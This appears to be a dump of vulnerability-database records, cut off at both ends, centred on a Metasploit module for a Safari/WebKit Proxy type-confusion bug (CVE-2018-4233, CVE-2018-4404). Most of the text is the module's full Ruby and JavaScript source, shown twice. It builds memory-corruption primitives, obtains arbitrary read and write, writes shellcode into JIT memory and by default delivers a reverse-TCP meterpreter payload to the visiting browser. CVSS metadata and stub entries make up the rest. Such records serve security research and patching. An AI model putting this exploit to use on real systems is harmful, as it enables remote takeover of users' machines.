};\n var ObjFakerProxy = new Proxy(ObjFaker, handler);\n\n for (var i = 0; i < 100000; i++) {\n new ObjFakerProxy([1.1, 2.2, 3.3], 13.37);\n }\n\n trigger = true;\n\n return function(address) {\n arg = [1.1, 1.1];\n var o = new ObjFakerProxy(arg, address);\n return arg[0];\n };\n}\n\nfunction makeJITCompiledFunction() {\n // Some code to avoid inlining...\n function target(num) {\n for (var i = 2; i < num; i++) {\n if (num % i === 0) {\n return false;\n }\n }\n return true;\n }\n\n // Force JIT compilation.\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n return target;\n}\n\nfunction pwn() {\n // Spray Float64Array structures so that structure ID 0x1000 will\n // be a Float64Array with very high probability\n var structs = [];\n for (var i = 0; i < 0x1000; i++) {\n var a = new Float64Array(1);\n a['prop' + i] = 1337;\n structs.push(a);\n }\n\n // Setup exploit primitives\n var addrofOnce = setupAddrof();\n var fakeobjOnce = setupFakeobj();\n\n // (Optional) Spray stuff to keep the background GC busy and increase reliability even further\n /*\n var stuff = [];\n for (var i = 0; i < 0x100000; i++) {\n stuff.push({foo: i});\n }\n */\n\n var float64MemView = new Float64Array(0x200);\n var uint8MemView = new Uint8Array(0x1000);\n\n // Setup container to host the fake Float64Array\n var jsCellHeader = new Int64([\n 00, 0x10, 00, 00, // m_structureID\n 0x0, // m_indexingType\n 0x2b, // m_type\n 0x08, // m_flags\n 0x1 // m_cellState\n ]);\n\n var container = {\n jsCellHeader: jsCellHeader.asJSValue(),\n butterfly: null,\n vector: float64MemView,\n length: (new Int64('0x0001000000001337')).asJSValue(),\n mode: {}, // an empty object, we'll need that later\n };\n\n // Leak address and inject fake object\n // RawAddr == address in float64 form\n var containerRawAddr = addrofOnce(container);\n var fakeArrayAddr = Add(Int64.fromDouble(containerRawAddr), 16);\n print(\"[+] Fake Float64Array @ \" + fakeArrayAddr);\n\n ///\n /// BEGIN CRITICAL SECTION\n ///\n /// Objects are corrupted, a GC would now crash the process.\n /// We'll try to repair everything as quickly as possible and with a minimal amount of memory allocations.\n ///\n var driver = fakeobjOnce(fakeArrayAddr.asDouble());\n while (!(driver instanceof Float64Array)) {\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\n container.jsCellHeader = jsCellHeader.asJSValue();\n }\n\n // Get some addresses that we'll need to repair our objects. We'll abuse the .mode\n // property of the container to leak addresses.\n driver[2] = containerRawAddr;\n var emptyObjectRawAddr = float64MemView[6];\n container.mode = referenceFloat64Array;\n var referenceFloat64ArrayRawAddr = float64MemView[6];\n\n // Fixup the JSCell header of the container to make it look like an empty object.\n // By default, JSObjects have an inline capacity of 6, enough to hold the fake Float64Array.\n driver[2] = emptyObjectRawAddr;\n var header = float64MemView[0];\n driver[2] = containerRawAddr;\n float64MemView[0] = header;\n\n // Copy the JSCell header from an existing Float64Array and set the butterfly to zero.\n // Also set the mode: make it look like an OversizeTypedArray for easy GC survival\n // (see JSGenericTypedArrayView<Adaptor>::visitChildren).\n driver[2] = referenceFloat64ArrayRawAddr;\n var header = float64MemView[0];\n var length = float64MemView[3];\n var mode = float64MemView[4];\n driver[2] = containerRawAddr;\n float64MemView[2] = header;\n float64MemView[3] = 0;\n float64MemView[5] = length;\n float64MemView[6] = mode;\n\n // Root the container object so it isn't garbage collected.\n // This will allocate a butterfly for the fake object and store a reference to the container there.\n // The fake array itself is rooted by the memory object (closures).\n driver.container = container;\n\n ///\n /// END CRITICAL SECTION\n ///\n /// Objects are repaired, we will now survive a GC\n ///\n if (typeof(gc) !== 'undefined')\n gc();\n\n memory = {\n read: function(addr, length) {\n driver[2] = memory.addrof(uint8MemView).asDouble();\n float64MemView[2] = addr.asDouble();\n var a = new Array(length);\n for (var i = 0; i < length; i++)\n a[i] = uint8MemView[i];\n return a;\n },\n\n write: function(addr, data) {\n driver[2] = memory.addrof(uint8MemView).asDouble();\n float64MemView[2] = addr.asDouble();\n for (var i = 0; i < data.length; i++)\n uint8MemView[i] = data[i];\n },\n\n read8: function(addr) {\n driver[2] = addr.asDouble();\n return Int64.fromDouble(float64MemView[0]);\n },\n\n write8: function(addr, value) {\n driver[2] = addr.asDouble();\n float64MemView[0] = value.asDouble();\n },\n\n addrof: function(obj) {\n float64MemView.leakme = obj;\n var butterfly = Int64.fromDouble(driver[1]);\n return memory.read8(Sub(butterfly, 0x10));\n },\n };\n\n print(\"[+] Got stable memory read/write!\");\n\n // Find binary base\n var funcAddr = memory.addrof(Math.sin);\n var executableAddr = memory.read8(Add(funcAddr, 24));\n var codeAddr = memory.read8(Add(executableAddr, 24));\n var vtabAddr = memory.read8(codeAddr);\n var jscBaseUnaligned = Sub(vtabAddr, JSC_VTAB_OFFSET);\n print(\"[*] JavaScriptCore.dylib @ \" + jscBaseUnaligned);\n var jscBase = And(jscBaseUnaligned, new Int64(\"0x7ffffffff000\"));\n print(\"[*] JavaScriptCore.dylib @ \" + jscBase);\n\n var dyldStubLoaderAddr = memory.read8(jscBase);\n var dyldBase = Sub(dyldStubLoaderAddr, DYLD_STUB_LOADER_OFFSET);\n var strlenAddr = memory.read8(Add(jscBase, STRLEN_GOT_OFFSET));\n var libCBase = Sub(strlenAddr, STRLEN_OFFSET);\n print(\"[*] dyld.dylib @ \" + dyldBase);\n print(\"[*] libsystem_c.dylib @ \" + libCBase);\n\n var confstrAddr = Add(libCBase, CONFSTR_OFFSET);\n print(\"[*] confstr @ \" + confstrAddr);\n var dlopenAddr = Add(dyldBase, DLOPEN_OFFSET);\n print(\"[*] dlopen @ \" + dlopenAddr);\n\n // Patching shellcode\n var stage2Addr = memory.addrof(stage2);\n stage2Addr = memory.read8(Add(stage2Addr, 16));\n print(\"[*] Stage 2 payload @ \" + stage2Addr);\n\n stage1.replace(new Int64(\"0x4141414141414141\"), confstrAddr);\n stage1.replace(new Int64(\"0x4242424242424242\"), stage2Addr);\n stage1.replace(new Int64(\"0x4343434343434343\"), new Int64(stage2.length));\n stage1.replace(new Int64(\"0x4444444444444444\"), dlopenAddr);\n print(\"[+] Shellcode patched\");\n\n // Leak JITCode pointer poison value\n var poison_addr = Add(jscBase, 305152);\n print(\"[*] Poison value @ \" + poison_addr);\n var poison = memory.read8(poison_addr);\n print(\"[*] Poison value: \" + poison);\n\n // Shellcode\n var func = makeJITCompiledFunction();\n var funcAddr = memory.addrof(func);\n print(\"[+] Shellcode function object @ \" + funcAddr);\n var executableAddr = memory.read8(Add(funcAddr, 24));\n print(\"[+] Executable instance @ \" + executableAddr);\n var jitCodeAddr = memory.read8(Add(executableAddr, 24));\n print(\"[+] JITCode instance @ \" + jitCodeAddr);\n\n var codeAddrPoisoned = memory.read8(Add(jitCodeAddr, 32));\n var codeAddr = Xor(codeAddrPoisoned, poison);\n print(\"[+] RWX memory @ \" + codeAddr.toString());\n print(\"[+] Writing shellcode...\");\n var origCode = memory.read(codeAddr, stage1.length);\n memory.write(codeAddr, stage1);\n\n print(\"[!] Jumping into shellcode...\");\n var res = func();\n if (res === 0) {\n print(\"[+] Shellcode executed sucessfully!\");\n } else {\n print(\"[-] Shellcode failed to execute: error \" + res);\n }\n\n memory.write(codeAddr, origCode);\n print(\"[*] Restored previous JIT code\");\n\n print(\"[+] We are done here, continuing WebContent process as if nothing happened =)\");\n if (typeof(gc) !== 'undefined')\n gc();\n}\n\nready.then(function() {\n try {\n pwn();\n } catch (e) {\n print(\"[-] Exception caught: \" + e);\n }\n}).catch(function(err) {\n print(\"[-] Initializatin failed\");\n});\n\n</script>\n</body>\n</html>\n ^\n unless datastore['DEBUG_EXPLOIT']\n html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '')\n end\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-01T21:00:54", "description": "This module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233). The JIT region is then replaced with shellcode which loads the second stage. The second stage exploits a logic error in libxpc, which uses command execution via the launchd's \"spawn_via_launchd\" API (CVE-2018-4404).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-15T00:44:18", "type": "metasploit", "title": "Safari Proxy Object Type Confusion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4233", "CVE-2018-4404"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT/OSX/BROWSER/SAFARI_PROXY_OBJECT_TYPE_CONFUSION/", "href": "https://www.rapid7.com/db/modules/exploit/osx/browser/safari_proxy_object_type_confusion/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Safari Proxy Object Type Confusion',\n 'Description' => %q{\n This module exploits a type confusion bug in the Javascript Proxy object in\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\n it is possible to run arbitrary JS code during the execution of a CreateThis\n operation. This makes it possible to change the structure of e.g. an argument\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\n\n The JIT region is then replaced with shellcode which loads the second stage.\n The second stage exploits a logic error in libxpc, which uses command execution\n via the launchd's \"spawn_via_launchd\" API (CVE-2018-4404).\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'saelo' ],\n 'References' => [\n ['CVE', '2018-4233'],\n ['CVE', '2018-4404'],\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\n ['URL', 'https://github.com/saelo/pwn2own2018'],\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\n ],\n 'Arch' => [ ARCH_PYTHON, ARCH_CMD ],\n 'Platform' => 'osx',\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' },\n 'Targets' => [\n [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],\n [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],\n ],\n 'DisclosureDate' => '2018-03-15'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\n ])\n end\n\n def offset_table\n {\n '10.12.6' => {\n jsc_vtab: '0x0000d8d8',\n dyld_stub_loader: '0x00001168',\n dlopen: '0x000027f7',\n confstr: '0x00002c84',\n strlen: '0x00001b40',\n strlen_got: '0xdc0'\n },\n '10.13' => {\n jsc_vtab: '0x0000e5f8',\n dyld_stub_loader: '0x000012a8',\n dlopen: '0x00002e60',\n confstr: '0x000024fc',\n strlen: '0x00001440',\n strlen_got: '0xee8'\n },\n '10.13.1' => {\n jsc_vtab: '0x0000e5f8',\n dyld_stub_loader: '0x000012a8',\n dlopen: '0x00002e60',\n confstr: '0x000024dc',\n strlen: '0x00001420',\n strlen_got: '0xee8'\n },\n '10.13.2' => {\n jsc_vtab: '0x0000e5e8',\n dyld_stub_loader: '0x00001278',\n dlopen: '0x00002e30',\n confstr: '0x000024dc',\n strlen: '0x00001420',\n strlen_got: '0xee0'\n },\n '10.13.3' => {\n jsc_vtab: '0xe5e8',\n dyld_stub_loader: '0x1278',\n dlopen: '0x2e30',\n confstr: '0x24dc',\n strlen: '0x1420',\n strlen_got: '0xee0'\n }\n }\n end\n\n def stage1_js\n stage1 = exploit_data \"CVE-2018-4233\", \"stage1.bin\"\n \"var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);\"\n end\n\n def stage2_js\n stage2 = exploit_data \"CVE-2018-4404\", \"stage2.dylib\"\n payload_cmd = payload.raw\n if target['Arch'] == ARCH_PYTHON\n payload_cmd = \"echo \\\"#{payload_cmd}\\\" | python\"\n end\n placeholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER')\n stage2[placeholder_index, payload_cmd.length] = payload_cmd\n \"var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);\"\n end\n\n def get_offsets(user_agent)\n if user_agent =~ /Intel Mac OS X (.*?)\\)/\n osx_version = $1.gsub(\"_\", \".\")\n if user_agent =~ /Version\\/(.*?) /\n if Rex::Version.new($1) >= Rex::Version.new('11.1.1')\n print_warning \"Safari version #{$1} is not vulnerable\"\n return false\n else\n print_good \"Safari version #{$1} appears to be vulnerable\"\n end\n end\n mac_osx_version = Rex::Version.new(osx_version)\n if mac_osx_version >= Rex::Version.new('10.13.4')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n elsif mac_osx_version < Rex::Version.new('10.12')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n elsif offset_table.key?(osx_version)\n offset = offset_table[osx_version]\n return <<-EOF\nconst JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};\nconst DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};\nconst DLOPEN_OFFSET = #{offset[:dlopen]};\nconst CONFSTR_OFFSET = #{offset[:confstr]};\nconst STRLEN_OFFSET = #{offset[:strlen]};\nconst STRLEN_GOT_OFFSET = #{offset[:strlen_got]};\nEOF\n else\n print_warning \"No offsets for version #{mac_osx_version}\"\n end\n else\n print_warning \"Unexpected User-Agent\"\n end\n return false\n end\n\n def on_request_uri(cli, request)\n user_agent = request['User-Agent']\n print_status(\"Request from #{user_agent}\")\n offsets = get_offsets(user_agent)\n unless offsets\n send_not_found(cli)\n return\n end\n\n utils = exploit_data \"javascript_utils\", \"utils.js\"\n int64 = exploit_data \"javascript_utils\", \"int64.js\"\n html = %Q^\n<html>\n<body>\n<script>\n#{stage1_js}\nstage1.replace = function(oldVal, newVal) {\n for (var idx = 0; idx < this.length; idx++) {\n var found = true;\n for (var j = idx; j < idx + 8; j++) {\n if (this[j] != oldVal.byteAt(j - idx)) {\n found = false;\n break;\n }\n }\n if (found)\n break;\n }\n this.set(newVal.bytes(), idx);\n};\n#{stage2_js}\n#{utils}\n#{int64}\n#{offsets}\n\nvar ready = new Promise(function(resolve) {\n if (typeof(window) === 'undefined')\n resolve();\n else\n window.onload = function() {\n resolve();\n }\n});\n\nready = Promise.all([ready]);\n\nprint = function(msg) {\n //console.log(msg);\n //document.body.innerText += msg + '\\\\n';\n}\n\n// Must create this indexing type transition first,\n// otherwise the JIT will deoptimize later.\nvar a = [13.37, 13.37];\na[0] = {};\n\nvar referenceFloat64Array = new Float64Array(0x1000);\n\n//\n// Bug: the DFG JIT does not take into account that, through the use of a\n// Proxy, it is possible to run arbitrary JS code during the execution of a\n// CreateThis operation. This makes it possible to change the structure of e.g.\n// an argument without causing a bailout, leading to a type confusion.\n//\n\n//\n// addrof primitive\n//\nfunction setupAddrof() {\n function InfoLeaker(a) {\n this.address = a[0];\n }\n\n var trigger = false;\n var leakme = null;\n var arg = null;\n\n var handler = {\n get(target, propname) {\n if (trigger)\n arg[0] = leakme;\n return target[propname];\n },\n };\n var InfoLeakerProxy = new Proxy(InfoLeaker, handler);\n\n for (var i = 0; i < 100000; i++) {\n new InfoLeakerProxy([1.1, 2.2, 3.3]);\n }\n\n trigger = true;\n\n return function(obj) {\n leakme = obj;\n arg = [1.1, 1.1];\n var o = new InfoLeakerProxy(arg);\n return o.address;\n };\n}\n\n//\n// fakeobj primitive\n//\nfunction setupFakeobj() {\n function ObjFaker(a, address) {\n a[0] = address;\n }\n\n var trigger = false;\n var arg = null;\n\n var handler = {\n get(target, propname) {\n if (trigger)\n arg[0] = {};\n return target[propname];\n },\n };\n var ObjFakerProxy = new Proxy(ObjFaker, handler);\n\n for (var i = 0; i < 100000; i++) {\n new ObjFakerProxy([1.1, 2.2, 3.3], 13.37);\n }\n\n trigger = true;\n\n return function(address) {\n arg = [1.1, 1.1];\n var o = new ObjFakerProxy(arg, address);\n return arg[0];\n };\n}\n\nfunction makeJITCompiledFunction() {\n // Some code to avoid inlining...\n function target(num) {\n for (var i = 2; i < num; i++) {\n if (num % i === 0) {\n return false;\n }\n }\n return true;\n }\n\n // Force JIT compilation.\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n return target;\n}\n\nfunction pwn() {\n // Spray Float64Array structures so that structure ID 0x1000 will\n // be a Float64Array with very high probability\n var structs = [];\n for (var i = 0; i < 0x1000; i++) {\n var a = new Float64Array(1);\n a['prop' + i] = 1337;\n structs.push(a);\n }\n\n // Setup exploit primitives\n var addrofOnce = setupAddrof();\n var fakeobjOnce = setupFakeobj();\n\n // (Optional) Spray stuff to keep the background GC busy and increase reliability even further\n /*\n var stuff = [];\n for (var i = 0; i < 0x100000; i++) {\n stuff.push({foo: i});\n }\n */\n\n var float64MemView = new Float64Array(0x200);\n var uint8MemView = new Uint8Array(0x1000);\n\n // Setup container to host the fake Float64Array\n var jsCellHeader = new Int64([\n 00, 0x10, 00, 00, // m_structureID\n 0x0, // m_indexingType\n 0x2b, // m_type\n 0x08, // m_flags\n 0x1 // m_cellState\n ]);\n\n var container = {\n jsCellHeader: jsCellHeader.asJSValue(),\n butterfly: null,\n vector: float64MemView,\n length: (new Int64('0x0001000000001337')).asJSValue(),\n mode: {}, // an empty object, we'll need that later\n };\n\n // Leak address and inject fake object\n // RawAddr == address in float64 form\n var containerRawAddr = addrofOnce(container);\n var fakeArrayAddr = Add(Int64.fromDouble(containerRawAddr), 16);\n print(\"[+] Fake Float64Array @ \" + fakeArrayAddr);\n\n ///\n /// BEGIN CRITICAL SECTION\n ///\n /// Objects are corrupted, a GC would now crash the process.\n /// We'll try to repair everything as quickly as possible and with a minimal amount of memory allocations.\n ///\n var driver = fakeobjOnce(fakeArrayAddr.asDouble());\n while (!(driver instanceof Float64Array)) {\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\n container.jsCellHeader = jsCellHeader.asJSValue();\n }\n\n // Get some addresses that we'll need to repair our objects. We'll abuse the .mode\n // property of the container to leak addresses.\n driver[2] = containerRawAddr;\n var emptyObjectRawAddr = float64MemView[6];\n container.mode = referenceFloat64Array;\n var referenceFloat64ArrayRawAddr = float64MemView[6];\n\n // Fixup the JSCell header of the container to make it look like an empty object.\n // By default, JSObjects have an inline capacity of 6, enough to hold the fake Float64Array.\n driver[2] = emptyObjectRawAddr;\n var header = float64MemView[0];\n driver[2] = containerRawAddr;\n float64MemView[0] = header;\n\n // Copy the JSCell header from an existing Float64Array and set the butterfly to zero.\n // Also set the mode: make it look like an OversizeTypedArray for easy GC survival\n // (see JSGenericTypedArrayView<Adaptor>::visitChildren).\n driver[2] = referenceFloat64ArrayRawAddr;\n var header = float64MemView[0];\n var length = float64MemView[3];\n var mode = float64MemView[4];\n driver[2] = containerRawAddr;\n float64MemView[2] = header;\n float64MemView[3] = 0;\n float64MemView[5] = length;\n float64MemView[6] = mode;\n\n // Root the container object so it isn't garbage collected.\n // This will allocate a butterfly for the fake object and store a reference to the container there.\n // The fake array itself is rooted by the memory object (closures).\n driver.container = container;\n\n ///\n /// END CRITICAL SECTION\n ///\n /// Objects are repaired, we will now survive a GC\n ///\n if (typeof(gc) !== 'undefined')\n gc();\n\n memory = {\n read: function(addr, length) {\n driver[2] = memory.addrof(uint8MemView).asDouble();\n float64MemView[2] = addr.asDouble();\n var a = new Array(length);\n for (var i = 0; i < length; i++)\n a[i] = uint8MemView[i];\n return a;\n },\n\n write: function(addr, data) {\n driver[2] = memory.addrof(uint8MemView).asDouble();\n float64MemView[2] = addr.asDouble();\n for (var i = 0; i < data.length; i++)\n uint8MemView[i] = data[i];\n },\n\n read8: function(addr) {\n driver[2] = addr.asDouble();\n return Int64.fromDouble(float64MemView[0]);\n },\n\n write8: function(addr, value) {\n driver[2] = addr.asDouble();\n float64MemView[0] = value.asDouble();\n },\n\n addrof: function(obj) {\n float64MemView.leakme = obj;\n var butterfly = Int64.fromDouble(driver[1]);\n return memory.read8(Sub(butterfly, 0x10));\n },\n };\n\n print(\"[+] Got stable memory read/write!\");\n\n // Find binary base\n var funcAddr = memory.addrof(Math.sin);\n var executableAddr = memory.read8(Add(funcAddr, 24));\n var codeAddr = memory.read8(Add(executableAddr, 24));\n var vtabAddr = memory.read8(codeAddr);\n var jscBaseUnaligned = Sub(vtabAddr, JSC_VTAB_OFFSET);\n print(\"[*] JavaScriptCore.dylib @ \" + jscBaseUnaligned);\n var jscBase = And(jscBaseUnaligned, new Int64(\"0x7ffffffff000\"));\n print(\"[*] JavaScriptCore.dylib @ \" + jscBase);\n\n var dyldStubLoaderAddr = memory.read8(jscBase);\n var dyldBase = Sub(dyldStubLoaderAddr, DYLD_STUB_LOADER_OFFSET);\n var strlenAddr = memory.read8(Add(jscBase, STRLEN_GOT_OFFSET));\n var libCBase = Sub(strlenAddr, STRLEN_OFFSET);\n print(\"[*] dyld.dylib @ \" + dyldBase);\n print(\"[*] libsystem_c.dylib @ \" + libCBase);\n\n var confstrAddr = Add(libCBase, CONFSTR_OFFSET);\n print(\"[*] confstr @ \" + confstrAddr);\n var dlopenAddr = Add(dyldBase, DLOPEN_OFFSET);\n print(\"[*] dlopen @ \" + dlopenAddr);\n\n // Patching shellcode\n var stage2Addr = memory.addrof(stage2);\n stage2Addr = memory.read8(Add(stage2Addr, 16));\n print(\"[*] Stage 2 payload @ \" + stage2Addr);\n\n stage1.replace(new Int64(\"0x4141414141414141\"), confstrAddr);\n stage1.replace(new Int64(\"0x4242424242424242\"), stage2Addr);\n stage1.replace(new Int64(\"0x4343434343434343\"), new Int64(stage2.length));\n stage1.replace(new Int64(\"0x4444444444444444\"), dlopenAddr);\n print(\"[+] Shellcode patched\");\n\n // Leak JITCode pointer poison value\n var poison_addr = Add(jscBase, 305152);\n print(\"[*] Poison value @ \" + poison_addr);\n var poison = memory.read8(poison_addr);\n print(\"[*] Poison value: \" + poison);\n\n // Shellcode\n var func = makeJITCompiledFunction();\n var funcAddr = memory.addrof(func);\n print(\"[+] Shellcode function object @ \" + funcAddr);\n var executableAddr = memory.read8(Add(funcAddr, 24));\n print(\"[+] Executable instance @ \" + executableAddr);\n var jitCodeAddr = memory.read8(Add(executableAddr, 24));\n print(\"[+] JITCode instance @ \" + jitCodeAddr);\n\n var codeAddrPoisoned = memory.read8(Add(jitCodeAddr, 32));\n var codeAddr = Xor(codeAddrPoisoned, poison);\n print(\"[+] RWX memory @ \" + codeAddr.toString());\n print(\"[+] Writing shellcode...\");\n var origCode = memory.read(codeAddr, stage1.length);\n memory.write(codeAddr, stage1);\n\n print(\"[!] Jumping into shellcode...\");\n var res = func();\n if (res === 0) {\n print(\"[+] Shellcode executed sucessfully!\");\n } else {\n print(\"[-] Shellcode failed to execute: error \" + res);\n }\n\n memory.write(codeAddr, origCode);\n print(\"[*] Restored previous JIT code\");\n\n print(\"[+] We are done here, continuing WebContent process as if nothing happened =)\");\n if (typeof(gc) !== 'undefined')\n gc();\n}\n\nready.then(function() {\n try {\n pwn();\n } catch (e) {\n print(\"[-] Exception caught: \" + e);\n }\n}).catch(function(err) {\n print(\"[-] Initializatin failed\");\n});\n\n</script>\n</body>\n</html>\n ^\n unless datastore['DEBUG_EXPLOIT']\n html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '')\n end\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-27T16:19:04", "description": "\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Apple iTunes security update for CVE-2018-4233", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4233"], "modified": "1976-01-01T00:00:00", "id": "MSF:ILITIES/APPLE-ITUNES-CVE-2018-4233/", "href": "", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-27T16:19:20", "description": "\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Apple Safari security update for CVE-2018-4233", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4233"], "modified": "1976-01-01T00:00:00", "id": "MSF:ILITIES/APPLE-SAFARI-CVE-2018-4233/", "href": "", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T07:31:08", "description": "This module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233). The type confusion leads to the ability to allocate fake Javascript objects, as well as the ability to find the address in memory of a Javascript object. This allows us to construct a fake JSCell object that can be used to read and write arbitrary memory from Javascript. The module then uses a ROP chain to write the first stage shellcode into executable memory within the Safari process and kick off its execution. The first stage maps the second stage macho (containing CVE-2017-13861) into executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake exploit leads to a kernel task port (TFP0) that can read and write arbitrary kernel memory. The processes credential and sandbox structure in the kernel is overwritten and the meterpreter payloads code signature hash is added to the kernels trust cache, allowing Safari to load and execute the (self-signed) meterpreter payload.\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-02T02:19:24", "type": "metasploit", "title": "Safari Webkit Proxy Object Type Confusion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 